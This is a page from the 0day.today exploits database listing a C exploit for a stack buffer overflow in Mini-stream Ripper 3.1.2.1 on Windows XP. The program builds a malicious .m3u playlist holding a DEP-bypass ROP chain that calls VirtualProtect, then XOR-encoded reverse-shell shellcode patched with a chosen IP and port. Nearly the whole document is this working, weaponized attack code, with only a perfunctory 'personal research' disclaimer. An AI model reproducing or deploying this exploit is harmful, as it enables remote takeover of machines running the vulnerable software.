[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Mini-stream Ripper v3.1.2.1 Buffer Overflow (DEP Bypass)

Author
fl0 fl0w
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-13614
Category
local exploits
Date add
07-08-2010
Platform
windows
========================================================
Mini-stream Ripper v3.1.2.1 Buffer Overflow (DEP Bypass)
========================================================

/*
   DISCLAIMER
     
   THIS PROGRAM IS NOT INTENDED TO BE USED ON OTHER COMPUTERS AND IT IS DESTINED FOR PERSONAL RESEARCH ONLY!!!!
   The programs are provided as is without any guarantees or warranty.
   The author is not responsible for any damage or losses of any kind caused by the use or misuse of the programs.
   The author is under no obligation to provide support, service, corrections, or upgrades to the free software programs.
     
   Author:                fl0 fl0w
   Software:              Mini-stream Ripper?
   Dl link:               http://www.mini-stream.net/downloads/Mini-streamRipper.exe
   Test platform:         Microsoft Windows xp sp3 with full updates
   Afected Versions:      3.1.2.1.2010.03.30
   Remote:                No
   Local:                 Yes
   Class:                 Boundary Condition Error
   Bug:                   Stack buffer overflow
   Exploitable:           Yes
   Method of exploitation:Ret to libc 
   Afected software:      Windows 98/Me/2000/XP 
   Fix:                   No fix  
   Compiler:              gcc version 3.4.4 (cygming special, gdc 0.12, using dmd 0.125)
   Video:                 http://www.youtube.com/watch?v=Prf-YCVrSfc   
   The .C code:
 */
  
  
#include<stdio.h>
 
#define HEAD  "\x23\x45\x58\x54\x4D\x33\x55\x0D\x0A"
#define URL   "\x68\x74\x74\x70\x3A\x2F\x2F"
#define CHARS "0123456789ABCDEFGHIJKLMNOPQRST" \
              "UVWXYZabcdefghijklmnopqrstuvwxyz"
#define VIDEO "\t-www.youtube.com/watch?v=Prf-YCVrSfc"                      
#define VER   "3.1.2.1.2010.03.30"           
#define TITLE "  Mini-stream Ripper "VER" local buffer overflow(DEP bypass)\n" \
              "\t-by fl0 fl0w\n "VIDEO" "
    unsigned char reverse_sc[] =
             {
                    "\xEB\x10\x5B\x4B\x33\xC9\x66\xB9\x25\x01\x80\x34\x0B\x99\xE2\xFA"
                    "\xEB\x05\xE8\xEB\xFF\xFF\xFF\x70\x62\x99\x99\x99\xC6\xFD\x38\xA9"
                    "\x99\x99\x99\x12\xD9\x95\x12\xE9\x85\x34\x12\xF1\x91\x12\x6E\xF3"
                    "\x9D\xC0\x71\x02\x99\x99\x99\x7B\x60\xF1\xAA\xAB\x99\x99\xF1\xEE"
                    "\xEA\xAB\xC6\xCD\x66\x8F\x12\x71\xF3\x9D\xC0\x71\x1B\x99\x99\x99"
                    "\x7B\x60\x18\x75\x09\x98\x99\x99\xCD\xF1\x98\x98\x99\x99\x66\xCF"
                    "\x89\xC9\xC9\xC9\xC9\xD9\xC9\xD9\xC9\x66\xCF\x8D\x12\x41\xF1\xE6"
                    "\x99\x99\x98\xF1\x9B\x99\x9D\x4B\x12\x55\xF3\x89\xC8\xCA\x66\xCF"
                    "\x81\x1C\x59\xEC\xD3\xF1\xFA\xF4\xFD\x99\x10\xFF\xA9\x1A\x75\xCD"
                    "\x14\xA5\xBD\xF3\x8C\xC0\x32\x7B\x64\x5F\xDD\xBD\x89\xDD\x67\xDD"
                    "\xBD\xA4\x10\xC5\xBD\xD1\x10\xC5\xBD\xD5\x10\xC5\xBD\xC9\x14\xDD"
                    "\xBD\x89\xCD\xC9\xC8\xC8\xC8\xF3\x98\xC8\xC8\x66\xEF\xA9\xC8\x66"
                    "\xCF\x9D\x12\x55\xF3\x66\x66\xA8\x66\xCF\x91\xCA\x66\xCF\x85\x66"
                    "\xCF\x95\xC8\xCF\x12\xDC\xA5\x12\xCD\xB1\xE1\x9A\x4C\xCB\x12\xEB"
                    "\xB9\x9A\x6C\xAA\x50\xD0\xD8\x34\x9A\x5C\xAA\x42\x96\x27\x89\xA3"
                    "\x4F\xED\x91\x58\x52\x94\x9A\x43\xD9\x72\x68\xA2\x86\xEC\x7E\xC3"
                    "\x12\xC3\xBD\x9A\x44\xFF\x12\x95\xD2\x12\xC3\x85\x9A\x44\x12\x9D"
                    "\x12\x9A\x5C\x32\xC7\xC0\x5A\x71\x99\x66\x66\x66\x17\xD7\x97\x75"
                    "\xEB\x67\x2A\x8F\x34\x40\x9C\x57\x76\x57\x79\xF9\x52\x74\x65\xA2"
                    "\x40\x90\x6C\x34\x75\x60\x33\xF9\x7E\xE0\x5F\xE0"
             } ;
    /* rop assembly
     _start:
      
     grab_stack_pointer:
          retn
      
     save_stack_pointer:
          push esp          
          mov eax,edx
          pop edi
          retn          
          pop eax
          retn
          add esp,2c
          retn       
      
     push_VirtualProtect:
          mov edi,edi
          push ebp
          mov ebp,esp
          push dword ptr ss:[ebp+14]
          push dword ptr ss:[ebp+10]
          push dword ptr ss:[ebp+c]
          push dword ptr ss:[ebp+8]
          push -1
          call kernel32.VirtualProtectEx
          pop ebp
          retn 10
         
     lpAddress:
          xchg esi,edi
          dec ecx
          retn 4
          add eax,100
          pop ebp
          retn       
          mov dword ptr ds:[esi+10],eax
          mov eax,esi
          pop esi
          retn
      
     dwSize:    
          push eax
          pop esi
          retn
          add eax,100
          pop ebp
          retn
          inc esi
          retn
          inc esi
          retn
          inc esi
          retn
          inc esi
          retn
          mov dword ptr ds:[esi+10],eax
          mov eax,esi
          pop esi
          retn
           
     flNewProtect:
          push eax
          pop esi
          retn
          xor eax,eax
          retn
          add eax,100
          pop ebp
          retn
          add eax,100
          pop ebp
          retn
          add eax,100
          pop ebp
          retn
          inc esi
          retn
          inc esi
          retn
          inc esi
          retn
          inc esi
          retn
          mov dword ptr ds:[esi+10],eax
          mov eax,esi
          pop esi
          retn
         
      lpflOldProtect:
          push eax
          pop esi
          retn
          xor eax,eax
          retn
          add eax,40
          retn
          inc esi
          retn
          inc esi
          retn
          inc esi
          retn
          inc esi
          retn
          mov dword ptr ds:[esi+10],eax
          mov eax,esi
          pop esi
          retn
          sub eax,4
          retn
          sub eax,4
          retn
          push eax
          pop esp
          mov eax,edi
          pop edi
          pop esi
          retn
  */            
  int eip_offset=17417;
  int nop_offset=17453;
  int shell_offset=17473;
  
  char RET[]="\x5e\x16\x80\x7c";
  char instr1[]="\x77\x92\xd7\x5a";
  char instr2[]="\x42\xe8\xc1\x77";
  char instr3[]="\x01\xd8\xc4\x77";
  char instr4[]="\x2b\xec\xc4\x77";
  char instr5[]="\x2f\x98\x3c\x76";
  char instr6[]="\x15\x41\xe8\x77";
  char instr7[]="\x4a\x14\x5d\x77";
  char instr8[]="\x1d\x7d\x15\x77";
  char instr9[]="\x9e\x66\xd7\x5a";   
  char instr10[]="\xbf\x8b\xca\x76";
  char instr11[]="\x1d\x14\x5d\x77";
  char instr12[]="\xa8\x5c\xdf\x73"; 
   
  char virtualprotect[]="\xD4\x1A\x80\x7C";//kernel32.dll
  char retaddr[]="\x41\x41\x44\x44";
  char lpaddr[]="\x45\x45\x45\x45";
  char sz[]="\x46\x46\x46\x46";
  char flnprot[]="\x47\x47\x47\x47"; 
   
int make_reverseshell(char *, char *);
void error_handle(void);
void copy_str(char*,char*,int);
void gen_random (char*, const int);
void file();
 
 
    int main()
   {  printf("%s",TITLE);
      file();
      return 0;
   }
  void file()
    { FILE* f=fopen("exploit.m3u","wb");
      unsigned char buf[100001];
        
    if(!f)
      error_handle();
    make_reverseshell("127.0.0.1","2010");//change here with what you want...
    gen_random(buf,26117); 
     
    memcpy(buf+eip_offset,RET,4);
    memcpy(buf+eip_offset+4,"aaaa",4);
    memcpy(buf+eip_offset+8,instr1,4);
    memcpy(buf+eip_offset+12,instr2,4);
    memcpy(buf+eip_offset+16,"bbbb",4);
    memcpy(buf+eip_offset+20,instr3,4);
    memcpy(buf+eip_offset+24,virtualprotect,4);
    memcpy(buf+eip_offset+28,retaddr,4);
    memcpy(buf+eip_offset+32,lpaddr,4);
    memcpy(buf+eip_offset+36,sz,4);
    memcpy(buf+eip_offset+40,flnprot,4);
     
    memset(buf+eip_offset+44,0x90,300);
    memcpy(buf+eip_offset+68,instr5,4);
    memcpy(buf+eip_offset+72,instr4,4);
    memcpy(buf+eip_offset+84,instr6,4);
    memcpy(buf+eip_offset+92,instr7,4);
    memcpy(buf+eip_offset+96,instr4,4);
     
    memcpy(buf+eip_offset+104,instr8,4);   
    memcpy(buf+eip_offset+108,instr8,4);
    memcpy(buf+eip_offset+112,instr8,4);
    memcpy(buf+eip_offset+116,instr8,4);
     
    memcpy(buf+eip_offset+120,instr6,4);
    memcpy(buf+eip_offset+128,instr7,4);
    memcpy(buf+eip_offset+132,instr9,4);
     
    memcpy(buf+eip_offset+136,instr4,4);
    memcpy(buf+eip_offset+144,instr4,4);
    memcpy(buf+eip_offset+152,instr4,4);
     
    memcpy(buf+eip_offset+160,instr8,4);   
    memcpy(buf+eip_offset+164,instr8,4);
    memcpy(buf+eip_offset+168,instr8,4);
    memcpy(buf+eip_offset+172,instr8,4);
     
    memcpy(buf+eip_offset+176,instr6,4);
    memcpy(buf+eip_offset+184,instr7,4);
    memcpy(buf+eip_offset+188,instr9,4);
     
    memcpy(buf+eip_offset+192,instr10,4);
     
    memcpy(buf+eip_offset+196,instr8,4);   
    memcpy(buf+eip_offset+200,instr8,4);
    memcpy(buf+eip_offset+204,instr8,4);
    memcpy(buf+eip_offset+208,instr8,4);
     
    memcpy(buf+eip_offset+212,instr6,4);
    memcpy(buf+eip_offset+220,instr11,4);
    memcpy(buf+eip_offset+224,instr11,4);
    memcpy(buf+eip_offset+228,instr12,4);
     
    memcpy(buf+eip_offset+344,reverse_sc,strlen(reverse_sc));//change here shellcode
     
    fwrite(HEAD,sizeof(char),strlen(HEAD),f);
    fwrite(URL,sizeof(char),strlen(URL),f);
    fwrite(buf,sizeof(char),strlen(buf),f);
         
    fclose(f);
    }
     void gen_random (char* s, const int len)
    { 
        int i;
        for(i=0;i<len;++i){
        s[i]=CHARS[rand()%(sizeof(CHARS)-1)];
        }
       s[len]=0;
    }
 
     void error_handle(void)
    {
          perror("\nError");
          exit(1);
    }
     
     int make_reverseshell(char *ip, char *port)
    {
        unsigned int xorip;
        unsigned short xorport;
        xorip = inet_addr(ip)^(unsigned int)0x99999999;
        xorport = htons(atoi( port )^(unsigned short)0x9999);
        memcpy ( &reverse_sc[111], &xorip, 4);
        memcpy ( &reverse_sc[118], &xorport, 2);
   }



#  0day.today [2024-12-24]  #